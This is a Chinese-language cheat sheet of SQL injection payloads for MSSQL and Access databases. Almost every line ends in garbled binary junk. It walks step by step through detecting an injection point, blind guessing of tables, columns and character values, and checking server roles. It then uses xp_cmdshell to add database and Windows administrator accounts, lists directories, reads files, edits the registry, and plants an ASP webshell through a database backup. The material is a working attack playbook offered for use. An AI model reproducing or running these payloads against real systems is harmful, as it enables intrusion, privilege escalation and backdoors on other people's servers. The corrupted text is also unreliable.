1.判断是否有注入;and 1=1 ;and 1=2 3URrK[%x`�
2.初步判断是否是mssql ;and user>0 Qc�s0�w��(
et�P`q:6^c
3.注入参数是字符'and [查询条件] and ''=' FFF7�f5F
��$��:DhK
4.搜索时没过滤参数的'and [查询条件] and '%25'=' Ahg6>7+R.�
kRzqgV�r%
5.判断数据库系统 P'J��b')�m
�.7#04�_aP
;and (select count(*) from sysobjects)>0 mssql ���UZc{ Av
0�j�'k%R[l
;and (select count(*) from msysobjects)>0 access C9T-��4�o1
gD�6BPW�~0
�a4�!6�K
-32.g�\��]
6.猜数据库 ;and (select Count(*) from [数据库名])>0 @eDL� ��j}
)#c��GeP�A
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �>�LR+dShG
BQ~�&�gy�{
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �v�{�U�1B�
w��{ x�=e�
9.(1)猜字段的ascii值(access) �QV%e���TA
zhw��aj�c
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �j7Lw(�A�J
�T�U���O#6
(2)猜字段的ascii值(mssql) Z�xv{qbF��
FEg&�E�YI
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 s8kk��f5bu
:3*�0o3�C/
10.测试权限结构(mssql) fbW#��6�:Y
]p~,�C*UH0
&T�-u�dgR9
m=I�A/HOR^
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 1FC��1*7A[
9hs7B!3pc>
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- !1?Nc}T0Q&
*
@j�#13.
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- nr{�}yQ�u�
K�f�NR)
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- s^AZ)k~J�(
3�s�Ge#s%�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- no�NL.%�I�
~7=w,+����
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- Wv)2�dD2I�
uI[lrMQYa
;and 1=(select IS_MEMBER('db_owner'));-- IqONDde�p9
P!2[#TL0��
,t>/_pI�+=
@�AkD-�}^[
11.添加mssql和系统的帐户 �[P�W*|�U
)c�<��5:c�
;exec master.dbo.sp_addlogin username;-- ;;�- I<�TL
;exec master.dbo.sp_password null,username,password;-- �� 0bk09�4
!ly]{DTm�m
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- LaiUf_W#X
}�vdh�k0��
;exec master.dbo.xp_cmdshell 'net user username password =u`�^��Q�E
rru `%�~'O
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- X�'>]�z'0W
o%A��@
OY
;exec master.dbo.xp_cmdshell 'net user username password /add';-- >U$,/_uMNW
G@QZmuj&KH
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- xpVYNS{c+|
#r)c@?T�@j
f�M�)R�O7
�u_U51C\rb
12.(1)遍历目录 4E&� 3{hnp
�PD�ssEb�7
;create table dirs(paths varchar(100), id int) H\<C@OkJS}
ve /��Q6j{
;insert dirs exec master.dbo.xp_dirtree 'c:\' N~� Xz�gI
nPUq+cXy]C
;and (select top 1 paths from dirs)>0 sL� ts�vH#
��S���Nd]c
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) SuW_[6��]�
1)M>vd�rP�
�Ye_)~,{,p
5ff6��6CRw
(2)遍历目录 #� �1,(�I
asI:J/%+2
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 4o2�C=?�@(
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 &sQ����tS�
�ghiFI<)VY
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 wLC|m�Byq
A`Bg"k�:D�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ��u]ZCYJ>�
@[�S\ F�jI
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 N�*My2t_+E
IX�f@YV��
J�j�'�~\j�
�/Et�:�',D
13.mssql中的存储过程 #3�u;���Ox
%zB�
`Sd�<
xp_regenumvalues 注册表根键, 子键 w]\O3'0J�s
|L7
�`7!Z
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �4>Q���6!"
��NP��Es0|
xp_regread 根键,子键,键值名 vV�|�u+v{�
�9o��Y%�v7
;exec xp_regread h�7��
�>��
"G�x�f[6B�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 q$s0�zqV5
U:x�r�['��
xp_regwrite 根键,子键, 值名, 值类型, 值 t{K1�ht$[:
nMXSp�X>!|
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 [ua{q�J9�
D�{/G�jF�O
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 nQvv'%v0��
%c(�':vI#�
xp_regdeletevalue 根键,子键,值名 7{X��I^I:n
�z@bi����X
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 n�l�K"2�/W
�r>�`6�5o�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 /W/ =�OP�e
�>9|/s�H@W
w.Ft-RXA W
aC$hg+U$�G
14.mssql的backup创建webshell mg*[,_3q33
�z.pP�~h�e
use model W��04-D���
6546"���sU
create table cmd(str image); ;e_�n7>'#%
R b6�`�k^
insert into cmd(str) values (''); %�Sfew/"R0
hHdH#-O:4"
backup database model to disk='c:\l.asp'; h4S�,(*V$!
��qV.*sdS>
+X0?�b�VT�
i}+K;,Da:8
15.mssql内置函数 h{kAsd�8 G
4�jj@"*^a�
;and (select @@version)>0 获得Windows的版本号 �k|�nv[xY0
c ��++tk4�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa do%6P^�q�A
2�|Hq[c�=~
;and (select user_name())>0 爆当前系统的连接用户 9#.nN�v*z3
W[:�
n�*h
;and (select db_name())>0 得到当前连接的数据库 �W)?B��{\�
z6b��!�,lp
�N%:QaCZKw
�X��61]N^y
16.简洁的webshell �%�X�
O9�7
�.T/\�5_Bx
use model v�VmoV0kGt
sC4��8o'8(
create table cmd(str image); SI)u@3hl&w
HkD6aJ:kA!
insert into cmd(str) values (''); �}�i��./,�
NI�\jG��R.
backup database model to disk='g:\wwwtest\l.asp';
